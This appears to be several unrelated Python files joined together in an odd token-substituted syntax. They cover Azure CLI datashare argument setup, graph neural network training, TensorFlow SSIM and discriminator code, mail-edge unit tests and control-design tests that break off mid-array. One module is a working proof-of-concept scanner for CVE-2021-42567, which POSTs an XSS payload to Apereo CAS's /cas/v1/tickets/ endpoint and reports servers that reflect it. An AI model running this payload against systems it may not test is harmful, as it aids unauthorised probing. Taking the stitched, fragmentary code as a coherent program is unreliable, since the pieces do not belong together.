share-subscription wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' options_list=['--name' '-n'] id_part='child_name_1' help='The name of the share subscription.')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription synchronization start')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_mode' arg_type=get_enum_type(SynchronizationMode) help='Synchronization mode')<block_end># modified <with_stmt>self.argument_context('datashare consumer share-subscription synchronization cancel')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_id' help='The synchronization GUID')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription synchronization wait')<as>c<block_start>c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_id' help='The synchronization GUID')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription synchronization list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer share-subscription synchronization list-detail')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('synchronization_id' help='Synchronization 
id')<block_end><with_stmt>self.argument_context('datashare consumer dataset-mapping list')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer dataset-mapping show')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' id_part='child_name_2' options_list=['--name' '-n'] help='The name of the datasetMapping.')<block_end># modified <with_stmt>self.argument_context('datashare consumer dataset-mapping create')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' options_list=['--name' '-n'] help='The name of the datasetMapping.')# modified c.argument('data_set_mapping' options_list=['--mapping'] type=validate_file_or_dict help='Dataset mapping in JSON string or path to JSON file.')<block_end># modified <with_stmt>self.argument_context('datashare consumer dataset-mapping delete')<as>c# modified <block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' id_part='child_name_2' options_list=['--name' '-n'] help='The name of the datasetMapping.')<block_end># modified <with_stmt>self.argument_context('datashare consumer dataset-mapping wait')<as>c<block_start>c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('data_set_mapping_name' id_part='child_name_2' options_list=['--name' '-n'] help='The name of the datasetMapping.')<block_end># modified <with_stmt>self.argument_context('datashare consumer trigger list')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share subscription.')<block_end><with_stmt>self.argument_context('datashare consumer trigger show')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')<line_sep>c.argument('trigger_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the trigger.')<block_end><with_stmt>self.argument_context('datashare consumer trigger create')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' help='The name of the share account.')<line_sep>c.argument('share_subscription_name' help='The name of the share 
subscription.')<line_sep>c.argument('trigger_name' options_list=['--name' '-n'] help='The name of the trigger.')# modified c.argument('recurrence_interval' arg_type=get_enum_type(RecurrenceInterval) arg_group='Synchronization Setting' help='Synchronization Recurrence Interval.')<line_sep>c.argument('synchronization_time' arg_group='Synchronization Setting' arg_type=get_datetime_type(help='Synchronization time.'))<line_sep>c.argument('kind' arg_type=get_enum_type(SynchronizationKind) arg_group='Synchronization Setting' default='ScheduleBased' help='Kind of synchronization.')<block_end><with_stmt>self.argument_context('datashare consumer trigger delete')<as>c<block_start>c.argument('resource_group_name' resource_group_name_type)# modified c.argument('account_name' id_part='name' help='The name of the share account.')# modified c.argument('share_subscription_name' id_part='child_name_1' help='The name of the share subscription.')# modified c.argument('trigger_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the trigger.')<block_end># modified <with_stmt>self.argument_context('datashare consumer trigger wait')<as>c<block_start>c.argument('trigger_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the trigger.')<block_end><block_end># modified
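# --- Illustrative sketch (not from the extension): example invocations that the
# argument registrations above are meant to back; resource names and values here
# are placeholders.
#
#   az datashare account create -g MyResourceGroup -n MyAccount -l "East US 2"
#   az datashare create -g MyResourceGroup --account-name MyAccount -n MyShare \
#       --description "test share" --terms "terms"
#   az datashare invitation create -g MyResourceGroup --account-name MyAccount \
#       --share-name MyShare -n MyInvitation --target-email user@contoso.com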
<import_stmt>os<import_stmt>random<import_stmt>numpy<as>np<import_from_stmt>collections Counter<import_from_stmt>sklearn.metrics r2_score<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.optim<as>optim<import_from_stmt>torch.optim.lr_scheduler ReduceLROnPlateau<import_stmt>torch.nn.functional<as>F<import_from_stmt>.models.graph_clf GraphClf<import_from_stmt>.models.text_graph TextGraphRegression TextGraphClf<import_from_stmt>.utils.text_data.vocab_utils VocabModel<import_from_stmt>.utils constants<as>Constants<import_from_stmt>.utils.generic_utils to_cuda create_mask<import_from_stmt>.utils.constants INF<import_from_stmt>.utils.radam RAdam<class_stmt>Model(object)<block_start>"""High level model that handles intializing the underlying network architecture, saving, updating examples, and predicting examples. """<def_stmt>__init__ self config train_set=<none><block_start>self.config=config<if_stmt>self.config['model_name']<eq>'GraphClf'<block_start>self.net_module=GraphClf<block_end><elif_stmt>self.config['model_name']<eq>'TextGraphRegression'<block_start>self.net_module=TextGraphRegression<block_end><elif_stmt>self.config['model_name']<eq>'TextGraphClf'<block_start>self.net_module=TextGraphClf<block_end><else_stmt><block_start><raise>RuntimeError('Unknown model_name: {}'.format(self.config['model_name']))<block_end>print('[ Running {} model ]'.format(self.config['model_name']))<if_stmt>config['data_type']<eq>'text'<block_start>saved_vocab_file=os.path.join(config['data_dir'] '{}_seed{}.vocab'.format(config['dataset_name'] config.get('data_seed' 1234)))<line_sep>self.vocab_model=VocabModel.build(saved_vocab_file train_set self.config)<block_end><if_stmt>config['task_type']<eq>'regression'<block_start><assert_stmt>config['out_predictions']<line_sep>self.criterion=F.mse_loss<line_sep>self.score_func=r2_score<line_sep>self.metric_name='r2'<block_end><elif_stmt>config['task_type']<eq>'classification'<block_start>self.criterion=F.nll_loss<line_sep>self.score_func=accuracy<line_sep>self.metric_name='acc'<block_end><else_stmt><block_start>self.criterion=F.nll_loss<line_sep>self.score_func=<none><line_sep>self.metric_name=<none><block_end><if_stmt>self.config['pretrained']<block_start>self.init_saved_network(self.config['pretrained'])<block_end><else_stmt># Building network. <block_start>self._init_new_network()<block_end>num_params=0<for_stmt>name,p self.network.named_parameters()<block_start>print('{}: {}'.format(name str(p.size())))<line_sep>num_params<augadd>p.numel()<block_end>print('#Parameters = {}\n'.format(num_params))<line_sep>self._init_optimizer()<block_end><def_stmt>init_saved_network self saved_dir<block_start>_ARGUMENTS=['word_embed_dim' 'hidden_size' 'f_qem' 'f_pos' 'f_ner' 'word_dropout' 'rnn_dropout' 'ctx_graph_hops' 'ctx_graph_topk' 'score_unk_threshold' 'score_yes_threshold' 'score_no_threshold']<line_sep># Load all saved fields. 
fname=os.path.join(saved_dir Constants._SAVED_WEIGHTS_FILE)<line_sep>print('[ Loading saved model %s ]'%fname)<line_sep>saved_params=torch.load(fname map_location=<lambda>storage loc:storage)<line_sep>self.state_dict=saved_params['state_dict']<line_sep># for k in _ARGUMENTS: # if saved_params['config'][k] != self.config[k]: # print('Overwrite {}: {} -> {}'.format(k, self.config[k], saved_params['config'][k])) # self.config[k] = saved_params['config'][k] <if_stmt>self.config['data_type']<eq>'text'<block_start>w_embedding=self._init_embedding(len(self.vocab_model.word_vocab) self.config['word_embed_dim'])<line_sep>self.network=self.net_module(self.config w_embedding self.vocab_model.word_vocab)<block_end><else_stmt><block_start>self.network=self.net_module(self.config)<block_end># Merge the arguments <if_stmt>self.state_dict<block_start>merged_state_dict=self.network.state_dict()<for_stmt>k,v self.state_dict['network'].items()<block_start><if_stmt>k<in>merged_state_dict<block_start>merged_state_dict[k]=v<block_end><block_end>self.network.load_state_dict(merged_state_dict)<block_end><block_end><def_stmt>_init_new_network self<block_start><if_stmt>self.config['data_type']<eq>'text'<block_start>w_embedding=self._init_embedding(len(self.vocab_model.word_vocab) self.config['word_embed_dim'] pretrained_vecs=self.vocab_model.word_vocab.embeddings)<line_sep>self.network=self.net_module(self.config w_embedding self.vocab_model.word_vocab)<block_end><else_stmt><block_start>self.network=self.net_module(self.config)<block_end><block_end><def_stmt>_init_optimizer self<block_start>parameters=[p<for>p self.network.parameters()<if>p.requires_grad]<if_stmt>self.config['optimizer']<eq>'sgd'<block_start>self.optimizer=optim.SGD(parameters self.config['learning_rate'] momentum=self.config['momentum'] weight_decay=self.config['weight_decay'])<block_end><elif_stmt>self.config['optimizer']<eq>'adam'<block_start>self.optimizer=optim.Adam(parameters lr=self.config['learning_rate'] weight_decay=self.config['weight_decay'])<block_end><elif_stmt>self.config['optimizer']<eq>'adamax'<block_start>self.optimizer=optim.Adamax(parameters lr=self.config['learning_rate'])<block_end><elif_stmt>self.config['optimizer']<eq>'radam'<block_start>self.optimizer=RAdam(parameters lr=self.config['learning_rate'] weight_decay=self.config['weight_decay'])<block_end><else_stmt><block_start><raise>RuntimeError('Unsupported optimizer: %s'%self.config['optimizer'])<block_end>self.scheduler=ReduceLROnPlateau(self.optimizer mode='max' factor=self.config['lr_reduce_factor'] patience=self.config['lr_patience'] verbose=<true>)<block_end><def_stmt>_init_embedding self vocab_size embed_size pretrained_vecs=<none><block_start>"""Initializes the embeddings """<line_sep><return>nn.Embedding(vocab_size embed_size padding_idx=0 _weight=torch.from_numpy(pretrained_vecs).float()<if>pretrained_vecs<is><not><none><else><none>)<block_end><def_stmt>save self dirname<block_start>params={'state_dict':{'network':self.network.state_dict() } 'config':self.config 'dir':dirname }<try_stmt><block_start>torch.save(params os.path.join(dirname Constants._SAVED_WEIGHTS_FILE))<block_end><except_stmt>BaseException<block_start>print('[ WARN: Saving failed... continuing anyway. 
]')<block_end><block_end><def_stmt>clip_grad self# Clip gradients <block_start><if_stmt>self.config['grad_clipping']<block_start>parameters=[p<for>p self.network.parameters()<if>p.requires_grad]<line_sep>torch.nn.utils.clip_grad_norm_(parameters self.config['grad_clipping'])<block_end><block_end><block_end><def_stmt>train_batch batch network vocab criterion forcing_ratio rl_ratio config wmd=<none><block_start>network.train(<true>)<with_stmt>torch.set_grad_enabled(<true>)<block_start>ext_vocab_size=batch['oov_dict'].ext_vocab_size<if>batch['oov_dict']<else><none><line_sep>network_out=network(batch batch['targets'] criterion forcing_ratio=forcing_ratio partial_forcing=config['partial_forcing'] sample=config['sample'] ext_vocab_size=ext_vocab_size include_cover_loss=config['show_cover_loss'])<if_stmt>rl_ratio<g>0<block_start>batch_size=batch['context'].shape[0]<line_sep>sample_out=network(batch saved_out=network_out criterion=criterion criterion_reduction=<false> criterion_nll_only=<true> sample=<true> ext_vocab_size=ext_vocab_size)<line_sep>baseline_out=network(batch saved_out=network_out visualize=<false> ext_vocab_size=ext_vocab_size)<line_sep>sample_out_decoded=sample_out.decoded_tokens.transpose(0 1)<line_sep>baseline_out_decoded=baseline_out.decoded_tokens.transpose(0 1)<line_sep>neg_reward=[]<for_stmt>i range(batch_size)<block_start>scores=eval_batch_output([batch['target_src'][i]] vocab batch['oov_dict'] [sample_out_decoded[i]] [baseline_out_decoded[i]])<line_sep>greedy_score=scores[1][config['rl_reward_metric']]<line_sep>reward_=scores[0][config['rl_reward_metric']]-greedy_score<if_stmt>config['rl_wmd_ratio']<g>0# Add word mover's distance <block_start>sample_seq=batch_decoded_index2word([sample_out_decoded[i]] vocab batch['oov_dict'])[0]<line_sep>greedy_seq=batch_decoded_index2word([baseline_out_decoded[i]] vocab batch['oov_dict'])[0]<line_sep>sample_wmd=-wmd.distance(sample_seq batch['target_src'][i])/max(len(sample_seq.split()) 1)<line_sep>greedy_wmd=-wmd.distance(greedy_seq batch['target_src'][i])/max(len(greedy_seq.split()) 1)<line_sep>wmd_reward_=sample_wmd-greedy_wmd<line_sep>wmd_reward_=max(min(wmd_reward_ config['max_wmd_reward']) -config['max_wmd_reward'])<line_sep>reward_<augadd>config['rl_wmd_ratio']<times>wmd_reward_<block_end>neg_reward.append(reward_)<block_end>neg_reward=to_cuda(torch.Tensor(neg_reward) network.device)<line_sep># if sample > baseline, the reward is positive (i.e. good exploration), rl_loss is negative rl_loss=torch.sum(neg_reward<times>sample_out.loss)/batch_size<line_sep>rl_loss_value=torch.sum(neg_reward<times>sample_out.loss_value).item()/batch_size<line_sep>loss=(1-rl_ratio)<times>network_out.loss+rl_ratio<times>rl_loss<line_sep>loss_value=(1-rl_ratio)<times>network_out.loss_value+rl_ratio<times>rl_loss_value<line_sep>metrics=eval_batch_output(batch['target_src'] vocab batch['oov_dict'] baseline_out.decoded_tokens)[0]<block_end><else_stmt><block_start>loss=network_out.loss<line_sep>loss_value=network_out.loss_value<line_sep>metrics=eval_batch_output(batch['target_src'] vocab batch['oov_dict'] network_out.decoded_tokens)[0]<block_end><block_end><return>loss loss_value metrics<block_end><def_stmt>accuracy labels output<block_start>preds=output.max(1)[1].type_as(labels)<line_sep>correct=preds.eq(labels).double()<line_sep>correct=correct.sum().item()<line_sep><return>correct/len(labels)<block_end>
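# --- Usage sketch (not in the original module): the accuracy() helper above takes
# raw class scores of shape [N, C] and integer labels of shape [N].
import torch

labels = torch.tensor([0, 2, 1])
output = torch.tensor([[2.0, 0.1, 0.3],   # argmax 0 -> correct
                       [0.2, 0.1, 1.5],   # argmax 2 -> correct
                       [0.9, 0.4, 0.1]])  # argmax 0 -> wrong
print(accuracy(labels, output))           # 2/3 ~= 0.667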
<import_stmt>requests<line_sep># Vuln Base Info <def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Apereo CAS Reflected Cross-Site Scripting''' "description":'''Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.''' "severity":"medium" "references":["https://apereo.github.io/2021/10/18/restvuln/" "https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html" "https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md" "https://nvd.nist.gov/vuln/detail/CVE-2021-42567" "https://github.com/apereo/cas/releases"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" "cvss-score":"" "cve-id":"CVE-2021-42567" "cwe-id":"CWE-79"} "metadata":{"vuln-target":"" "shodan-query":"""http.title:'CAS - Central Authentication Service'"""} "tags":["cve" "cve2021" "apereo" "xss" "cas"] }<block_end># Vender Fingerprint <def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept <def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/cas/v1/tickets/"""<line_sep>method="POST"<line_sep>data="""username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=<PASSWORD>"""<line_sep>headers={'Content-Type':'application/x-www-form-urlencoded'}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>("""<img/src/onerror=alert(document.domain)>"""<in>resp0.text<and>"""java.util.HashMap"""<in>resp0.text)<and>(resp0.status_code<eq>401)<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc() <def_stmt>exp url<block_start><return>poc(url)<block_end># Utils <def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
<import_stmt>tensorflow<as>tf<import_from_stmt>.layer *<class_stmt>Discriminator<block_start><def_stmt>__init__ self inputs targets ndf=64<block_start>n_layers=3<line_sep>layers=[]<line_sep>input=tf.concat([inputs targets] axis=3)<with_stmt>tf.variable_scope('layer_1')<block_start>convolved=discrim_conv(input ndf stride=2)<line_sep>rectified=lrelu(convolved 0.2)<line_sep>layers.append(rectified)<block_end><for_stmt>i range(n_layers)<block_start><with_stmt>tf.variable_scope('layer_%d'%(len(layers)+1))<block_start>out_channels=ndf<times>min(2<power>(i+1) 8)<line_sep>stride=1<if>i<eq>n_layers-1<else>2<line_sep>convolved=discrim_conv(layers[-1] out_channels stride=stride)<line_sep>normalized=batchnorm(convolved)<line_sep>rectified=lrelu(normalized 0.2)<line_sep>layers.append(rectified)<block_end><block_end><with_stmt>tf.variable_scope('layer_%d'%(len(layers)+1))<block_start>convolved=discrim_conv(rectified out_channels=1 stride=1)<line_sep>output=tf.sigmoid(convolved)<line_sep>layers.append(output)<block_end>self.logits=layers[-1]<block_end><block_end>
<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<def_stmt>_tf_fspecial_gauss size sigma ch=1<block_start>"""Function to mimic the 'fspecial' gaussian MATLAB function """<line_sep>x_data,y_data=np.mgrid[-size<floordiv>2+1:size<floordiv>2+1 -size<floordiv>2+1:size<floordiv>2+1]<line_sep>x_data=np.expand_dims(x_data axis=-1)<line_sep>x_data=np.expand_dims(x_data axis=-1)<line_sep>y_data=np.expand_dims(y_data axis=-1)<line_sep>y_data=np.expand_dims(y_data axis=-1)<line_sep>x=tf.constant(x_data dtype=tf.float32)<line_sep>y=tf.constant(y_data dtype=tf.float32)<line_sep>g=tf.exp(-((x<power>2+y<power>2)/(2.0<times>sigma<power>2)))<line_sep>g=tf.tile(g [1 1 ch 1])<line_sep><return>g/tf.reduce_sum(g)<block_end><def_stmt>tf_ssim img1 img2 cs_map=<false> mean_metric=<true> size=11 sigma=0.5<block_start>img1=tf.image.rgb_to_grayscale(img1)<line_sep>img2=tf.image.rgb_to_grayscale(img2)<line_sep>window=_tf_fspecial_gauss(size sigma ch=img1.get_shape().as_list()[-1])<line_sep># window shape [size, size] K1=0.01<line_sep>K2=0.03<line_sep>L=1# depth of image (255 in case the image has a differnt scale) C1=(K1<times>L)<power>2<line_sep>C2=(K2<times>L)<power>2<line_sep>mu1=tf.nn.conv2d(img1 window strides=[1 1 1 1] padding='VALID')<line_sep>mu2=tf.nn.conv2d(img2 window strides=[1 1 1 1] padding='VALID')<line_sep>mu1_sq=mu1<times>mu1<line_sep>mu2_sq=mu2<times>mu2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=tf.nn.conv2d(img1<times>img1 window strides=[1 1 1 1] padding='VALID')-mu1_sq<line_sep>sigma2_sq=tf.nn.conv2d(img2<times>img2 window strides=[1 1 1 1] padding='VALID')-mu2_sq<line_sep>sigma12=tf.nn.conv2d(img1<times>img2 window strides=[1 1 1 1] padding='VALID')-mu1_mu2<if_stmt>cs_map<block_start>value=(((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2)) (2.0<times>sigma12+C2)/(sigma1_sq+sigma2_sq+C2))<block_end><else_stmt><block_start>value=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<block_end><if_stmt>mean_metric<block_start>value=tf.reduce_mean(value)<block_end><return>value<block_end><def_stmt>tf_ms_ssim img1 img2 mean_metric=<true> level=5<block_start>weight=tf.constant([0.0448 0.2856 0.3001 0.2363 0.1333] dtype=tf.float32)<line_sep>mssim=[]<line_sep>mcs=[]<for_stmt>l range(level)<block_start>ssim_map,cs_map=tf_ssim(img1 img2 cs_map=<true> mean_metric=<false>)<line_sep>mssim.append(tf.reduce_mean(ssim_map))<line_sep>mcs.append(tf.reduce_mean(cs_map))<line_sep>filtered_im1=tf.nn.avg_pool(img1 [1 2 2 1] [1 2 2 1] padding='SAME')<line_sep>filtered_im2=tf.nn.avg_pool(img2 [1 2 2 1] [1 2 2 1] padding='SAME')<line_sep>img1=filtered_im1<line_sep>img2=filtered_im2<block_end># list to tensor of dim D+1 mssim=tf.pack(mssim axis=0)<line_sep>mcs=tf.pack(mcs axis=0)<line_sep>value=(tf.reduce_prod(mcs[0:level-1]<power>weight[0:level-1])<times>(mssim[level-1]<power>weight[level-1]))<if_stmt>mean_metric<block_start>value=tf.reduce_mean(value)<block_end><return>value<block_end>
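# Hedged usage sketch (assumptions: a TF1-style graph and Session are available and the 1x64x64x3 shape is only illustrative); feeding the same image twice should give an SSIM close to 1.0 <if_stmt>__name__<eq>"__main__"<block_start>img_a=tf.placeholder(tf.float32 [1 64 64 3])<line_sep>img_b=tf.placeholder(tf.float32 [1 64 64 3])<line_sep>ssim_op=tf_ssim(img_a img_b)<with_stmt>tf.Session()<as>sess<block_start>sample=np.random.rand(1 64 64 3).astype(np.float32)<line_sep>print(sess.run(ssim_op feed_dict={img_a:sample img_b:sample}))<block_end><block_end>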
<import_stmt>time<import_stmt>unittest<import_from_stmt>mox3.mox MoxTestBase<import_from_stmt>slimta.edge Edge EdgeServer<class_stmt>TestEdge(MoxTestBase unittest.TestCase)<block_start><def_stmt>test_handoff self<block_start>self.mox.StubOutWithMock(time 'time')<line_sep>env=self.mox.CreateMockAnything()<line_sep>queue=self.mox.CreateMockAnything()<line_sep>time.time().AndReturn(12345)<line_sep>queue.enqueue(env).AndReturn('asdf')<line_sep>self.mox.ReplayAll()<line_sep>edge=Edge(queue 'test.example.com')<line_sep>self.assertEqual('asdf' edge.handoff(env))<line_sep>self.assertEqual('test.example.com' env.receiver)<line_sep>self.assertEqual(12345 env.timestamp)<block_end><def_stmt>test_handoff_error self<block_start>env=self.mox.CreateMockAnything()<line_sep>queue=self.mox.CreateMockAnything()<line_sep>queue.enqueue(env).AndRaise(RuntimeError)<line_sep>self.mox.ReplayAll()<line_sep>edge=Edge(queue)<with_stmt>self.assertRaises(RuntimeError)<block_start>edge.handoff(env)<block_end><block_end><def_stmt>test_kill self<block_start>queue=self.mox.CreateMockAnything()<line_sep>self.mox.ReplayAll()<line_sep>edge=Edge(queue)<line_sep>edge.kill()<block_end><block_end><class_stmt>TestEdgeServer(MoxTestBase unittest.TestCase)<block_start><def_stmt>test_edge_interface self<block_start>edge=EdgeServer(('127.0.0.1' 0) <none>)<with_stmt>self.assertRaises(NotImplementedError)<block_start>edge.handle(<none> <none>)<block_end><block_end><def_stmt>test_handle self<block_start>queue=self.mox.CreateMockAnything()<line_sep>sock=self.mox.CreateMockAnything()<line_sep>edge=EdgeServer(('127.0.0.1' 0) queue)<line_sep>self.mox.StubOutWithMock(edge 'handle')<line_sep>sock.fileno().AndReturn(15)<line_sep>edge.handle(sock 'test address')<line_sep>self.mox.ReplayAll()<try_stmt><block_start>edge.server.pre_start()<block_end><except_stmt>AttributeError<block_start>edge.server.init_socket()<block_end>edge._handle(sock 'test address')<block_end><def_stmt>test_handle_error self<block_start>queue=self.mox.CreateMockAnything()<line_sep>sock=self.mox.CreateMockAnything()<line_sep>edge=EdgeServer(('127.0.0.1' 0) queue)<line_sep>self.mox.StubOutWithMock(edge 'handle')<line_sep>sock.fileno().AndReturn(15)<line_sep>edge.handle(sock 5).AndRaise(RuntimeError)<line_sep>self.mox.ReplayAll()<try_stmt><block_start>edge.server.pre_start()<block_end><except_stmt>AttributeError<block_start>edge.server.init_socket()<block_end><with_stmt>self.assertRaises(RuntimeError)<block_start>edge._handle(sock 5)<block_end><block_end><def_stmt>test_kill self<block_start>edge=EdgeServer(('127.0.0.1' 0) <none>)<line_sep>self.mox.StubOutWithMock(edge.server 'stop')<line_sep>edge.server.stop()<line_sep>self.mox.ReplayAll()<line_sep>edge.kill()<block_end><def_stmt>test_run self<block_start>edge=EdgeServer(('127.0.0.1' 0) <none>)<line_sep>self.mox.StubOutWithMock(edge.server 'start')<line_sep>self.mox.StubOutWithMock(edge.server 'serve_forever')<line_sep>edge.server.start()<line_sep>edge.server.serve_forever()<line_sep>self.mox.ReplayAll()<line_sep>edge._run()<block_end><block_end># vim:et:fdm=marker:sts=4:sw=4:ts=4
<import_from_stmt>numpy eye array sort empty<import_from_stmt>scipy.linalg block_diag eigvals<import_from_stmt>scipy.signal.filter_design _cplxpair<import_from_stmt>numpy.testing assert_almost_equal assert_array_almost_equal assert_array_equal <import_from_stmt>pytest raises<as>assert_raises<import_from_stmt>harold lqr ackermann State Transfer haroldcompanion<import_from_stmt>harold._static_ctrl_design _get_pole_reps<def_stmt>test_lqr_arguments # First arg is not LTI <block_start>assert_raises(ValueError lqr 1 1)<line_sep># Static Gain assert_raises(ValueError lqr State(1) 1)<line_sep># Wrong string assert_raises(ValueError lqr Transfer(1 [1 1]) 1 weight_on='asdf')<line_sep># scalar matrices H=Transfer(1 [1 1])<line_sep>k,x,e=lqr(H 3)<line_sep>assert_almost_equal(array([k[0 0] x[0 0] e[0]]) [1 1 -2+0j])<block_end><def_stmt>test_simple_lqr # Example taken from <NAME>'s MAE280B lecture notes <block_start>H=State([[0 0 1 0] [0 0 0 1] [4.03428022844288e-06 0 0 0.0515652322798669] [0 0 -0.000104315254033883 0]] [[0 0] [1e-5/3 0] [0 0] [0 0.01]] eye(4))<line_sep>k,_,_=lqr(H[: 1] eye(4))<line_sep>H.a=H.a.T<line_sep>f,_,_=lqr(H[: 0] block_diag(0 0 1e-5 1e-5) 0.1)<line_sep>assert_almost_equal(k array([[1.00554916 -1 52.52180106 18.51107167]]))<line_sep>assert_almost_equal(f array([[-577.370350 173.600463 0.383744946 0.050228534]]) decimal=5)<block_end><def_stmt>test_simple_lqry # Scalar matrices <block_start>H=State(1 1 1 1)<line_sep>k,x,e=lqr(H Q=3 weight_on='output')<line_sep>assert_almost_equal(array([k[0 0] x[0 0] e[0]]) [1.5 3 -0.5+0j])<line_sep># Wrong S shape assert_raises(ValueError lqr H Q=3 S=eye(2) weight_on='output')<block_end><def_stmt>test_simple_dlqr # Example taken from <NAME>'s MAE280B lecture notes <block_start>H=State([[0 0 1 0] [0 0 0 1] [4.03428022844288e-06 0 0 0.0515652322798669] [0 0 -0.000104315254033883 0]] [[0 0] [1e-5/3 0] [0 0] [0 0.01]] eye(4) dt=0.1)<line_sep>k,_,_=lqr(H[: 1] eye(4))<line_sep>H.a=H.a.T<line_sep>f,_,_=lqr(H[: 0] block_diag(0 0 1e-5 1e-5) 0.1)<line_sep>assert_almost_equal(k array([[0 0 -2.08727337333631e-06 0]]))<line_sep>assert_almost_equal(f array([[1.71884123e-11 0 0 -1.79301359e-15]]))<block_end><def_stmt>test_ackermann_args # Not SIxO system <block_start>G=State(eye(2) eye(2) eye(2))<line_sep>assert_raises(ValueError ackermann G [1 2])<line_sep># Wrong # of poles G=State(eye(2) [[1] [0]] [1 0])<line_sep>assert_raises(ValueError ackermann G [1 2 3])<block_end><def_stmt>test_ackermann_controllable # <block_start>A=haroldcompanion([1 6 5 1])<line_sep>B=eye(3)[: [-1]]<line_sep>p=[-10 -9 -8]<line_sep>K=ackermann((A B) p)<line_sep>pa=eigvals(A-B@K)<line_sep>assert_array_almost_equal(array(p dtype=complex) sort(pa))<block_end><def_stmt>test_ackermann_uncontrollable <block_start>A=block_diag(haroldcompanion([1 6 5 1]) 1)<line_sep>B=eye(4)[: [-2]]<line_sep>p=[-10 -9 -8 -7]<line_sep>assert_raises(ValueError ackermann (A B) p)<block_end><def_stmt>byersnash_A_B_test_pairs <block_start>ABs=[# Chemical Reactor (Munro 1979) (array([[1.38 -0.2077 6.715 -5.676] [-0.5814 -4.29 0 0.675] [1.067 4.273 -6.654 5.893] [0.048 4.273 1.343 -2.104]]) array([[0 0] [5.679 0] [1.136 -3.146] [1.136 0]])) # Distillation Column (<NAME> 1977) (array([[-0.1094 0.0628 0 0 0] [1.306 -2.132 0.9807 0 0] [0 1.595 -3.149 1.547 0] [0 0.0355 2.632 -4.257 1.855] [0 0.0023 0 0.1636 -0.1625]]) array([[0 0] [0.638 0] [0.0838 -0.1396] [0.1004 -0.206] [0.0063 -0.0128]])) # Nuclear rocket engine (<NAME> 1974) (array([[-65.0 65 -19.5 19.5] [0.1 -0.1 0 0] [1 0 -0.5 -1] [0 0 0.4 0]]) array([[65. 
